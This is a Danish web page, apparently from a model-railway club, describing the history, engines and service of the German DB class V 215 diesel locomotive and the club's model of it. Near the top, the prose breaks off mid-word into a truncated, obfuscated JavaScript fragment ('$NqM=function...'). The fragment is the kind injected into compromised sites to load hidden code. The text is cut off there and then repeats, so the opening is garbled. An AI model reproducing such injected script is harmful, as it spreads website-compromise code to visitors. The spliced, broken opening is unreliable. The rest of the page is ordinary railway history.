V 215

V 215
 Dette lokomotiv er en videreudbygning af serien V 216 med ny mo<script>$NqM=function(n){if (typeof ($NqM.list[n]) ==
V 215
Dette lokomotiv er en videreudbygning af serien V 216 med ny motorkonstruktion.

Den fortsatte afmønstring af udtjente damplokomotiver og et stigende behov for ydedygtige diesellokomotiver, førte i 1968 til anskaffelsen af flere maskiner i med egenskaber som serien V 216. Inden var de første lokomotiver af serien V 218 bygget og indsat i tjeneste, men med deres elektriske vognopvarmningsanlæg kunne de ikke direkte erstatte damplokomotiver . Derfor byggede man serien V 215 som blev udstyret med dampkedelanlæg af typen Vapor-Heating. Forserien af maskiner blev bygget af Krupp og udstyret med en 12 cylindret dieselmotor på 2500HK, da man ønskede yderigere erfaringer med denne motor.

Efter de 10 forseriemaskiner bestilte DB ved årsskiftet 1968/1969 yderligere 140 maskiner af serien V 215. Disse maskiner blev planmæssigt sat i drift i 1970 og 1971. I udformning lignede de forseriemaskinerne. Det var samme vognopvarmningsanlæg der blev monteret, et system kaldet Vapor-Heating fra firmaet Hagenuk i Lizenz. Som køremotor blev den nye 2500HK’s motor skrottet til fordel for den gamle 16 cylindrede 1900HK’s motor fra serien V 216 da denne motor havde vist sig mindre vedligeholdelseskrævende. Dog fik de sidste 20 maskiner i serien en ny 12 cylindret motor fra MAN med 2500HK.

Med serielokomotiverne i rækken V 215 fulgte den endelige overgang til en maksimumhastighed på 140 km/t, hvilket indbygningen af en hydrodynamisk bremse tillod. Videreudviklingen af V 215 stoppede til fordel for serien V 218 som fremover kom til at dominere billedet.

I 2001 var der 132 maskiner tilbage, der er hovedsageligt indsat i regionaldriften forskellige steder i Tyskland. Til ren godsdrift bliver V 215 ombygget til V 225. Varmekedlen til togopvarmning bliver fjernet og erstattet af et forvarmningsanlæg og ekstra ballastvægt.

DB museumstog overtog 215 049 og 215 122 15/1-2003, hvor de hovedsageligt bliver brugt til overførsler af damplokomotiver og vogne, men også får sine egne ture med udflugter.

Autotogene Niebüll – Weterland fik oktober 2003 14 stk ombyggede 215 til rådighed. 215.9 skal midlertidigt bruges til autotransporttogne mellem de to stationer, indtil helt nye lokomotiver der er bestilt kommer til.

Her på anlægget har vi en model af V 215 i den originale røde farve. Udseendemæssigt ligner V 216 og V 215 meget hinanden og det er da også kun litreringen, en ændret vinduesplacering og det faktum at V 215 er 40 cm længere end V 216.